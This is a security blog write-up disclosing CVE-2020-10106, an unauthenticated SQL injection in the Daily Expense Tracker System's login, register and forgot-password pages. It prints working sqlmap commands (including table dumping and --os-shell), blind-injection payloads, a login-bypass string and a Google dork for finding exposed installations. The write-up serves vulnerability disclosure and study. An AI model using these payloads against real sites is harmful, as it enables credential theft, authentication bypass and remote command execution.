CVE-2020-10106

Daily Expense Tracker System (DETS) is vulnerable to SQL injection. This post will be a brief write up about discovery and exploitation of CVE-2020-10106. These vulnerabilities exist in the Daily Expense Tracker System project version 1, which you can download from PHPGurukul, here

According to PHPGurukul’s website, this application has been downloaded 499 times – at time of vulnerability discovery. Using Google Dorks method of intitle:"Daily Expense Tracker - Login" there are some sites which could be vulnerable – unknown without confirmation.


Discovering the Vulnerability

I installed the DETS application using Bitnami XAMPP for Linux (aka LAMPP). The user lands on a login page within index.php. After static code analysis, it appeared that the SQL query could be vulnerable. More specifically, the email parameter. I believe that the password parameter is not vulnerable to SQL injection is because user input is hashed on the client side. This means that SQL injction payloads will be hashed and therefore cannot be interpreted by the SQL engine as special characters. The same cannot be said about the email parameter, which directly takes user input in the SQL query.

index.php contents

Verifying the Vulnerability

I captured a login request with Burpsuite and exported it to a file, which allows further investigation using sqlmap.

Login request
sqlmap output

I appreciate that the sqlmap output could be squashed a lot in this instance. Here is the key information:

$ sqlmap -r <login-request-file> --dbms=mysql 

sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests: 

---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    payload: email=oliver@frostylabs.net' AND (SELECT 7366 FROM (SELECT(SLEEP(5)))NgAy) AND 'KQtM'='KQtM&password=p4ssw0rd&login=login
---

The application is vulnerable to unauthenticated time-based SQL injection. Using sqlmap’s --dump flag, it is possible to dump the users table, and the associated account hash.

tables
tbluser contents

When using valid credentials in the sqlmap query, it is possible to perform a boolean based SQL injection.

---
parameter: email (POST) 
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: email=test@gmail.com' AND 7009=7009 AND 'wGtm'='wGtm&password=123&login=login
---

Further Exploitation

In addition to index.php, the same vulnerabilities as described above exist in register.php and forgot-password.php.

In addition to the Blind SQL injection, using the following payload allows for a complete bypass of the login prompt. However, the login prompt requires that an email is input, otherwise the user is not permitted to submit the form. This is overcame by intercepting the POST request, and altering the query. The HTTP 302 response as seen in the image below proves that the SQL injection has been successful.

a' OR '1'='1'; -- -
SQL Injection Authentication Bypass

Bonus

It is possible to leverage the SQL injection vulnerability to get remote command execution. However, the RCE vulnerability depends on SQLi therefore in my opinion the web application is not directly vulnerable to RCE, but rather RCE through SQLi. SQLMap is able to obtain this with the --os-shell flag.

$ sqlmap -r <login-request-file> --dbms=mysql --os-shell
Spawn a pseudo shell

3 thoughts on “CVE-2020-10106”

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.